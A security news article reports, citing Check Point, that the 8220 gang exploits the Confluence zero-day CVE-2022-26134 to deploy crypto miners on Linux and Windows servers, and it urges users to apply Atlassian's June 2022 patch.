Out of many threat actors exploiting the Confluence zero-day bug, CheckPoint researchers have noted a group called 8220 gang, that’s installing crypto miners for mining cryptocurrencies.
They target both the Linux and Windows machines with their mining malware and exhaust all the resources of vulnerable Confluence servers until they’re uprooted. To avoid this, the maker of Confluence – Atlassian, advised users to apply the patch update that was made available a week ago.
Exploiting Confluence Zero-Day Bug
Late last month, researchers found a new zero-day security vulnerability in Atlassian’s Confluence – a collaboration tool used by corporates for managing work and communications. Tracked as CVE-2022-26134, several proof-of-concept exploits for this bug were released soon after.
This led many threat actors to prey on vulnerable Confluence servers around the world, with most creating new admin accounts, installing web shells, and executing remote commands to ultimately take control of the exploited servers.
But researchers at CheckPoint have spotted a new threat actor named “8220 gang”, who’s been exploiting this bug for mining cryptocurrencies. As per their note, the hacker group starts their campaign by sending a specially crafted HTTP request to the vulnerable Confluence server, be it Linux or Windows.
This script exploits the bug to drop a base64-encoded payload, which in turn fetches an executable – a malware dropper script on Linux and a child process spawner on Windows. In both cases, these executables aim to attain a reboot persistence through cron jobs or startup folders.
Also, they uninstall all the running agents and then activate the miner to start the minting process. Cryptomining in the long term (or in the short term if being so harsh) would result in faster hardware wear-down, reduced server performance, and even business stoppage activities.
At last, the Linux script is even said to be looking for SSH keys to hijack and pool other systems in the network. Aside from this, few other Linux botnets like the Kinsing, Hezb, and Dark.IoT is also exploiting this zero-day bug to deploy backdoors and crypto miners, say, researchers.
To avoid this, the developer or infected Confluence suite, Atlassian, released a patch on June 3rd, 2022, and advised users to apply it as soon as possible.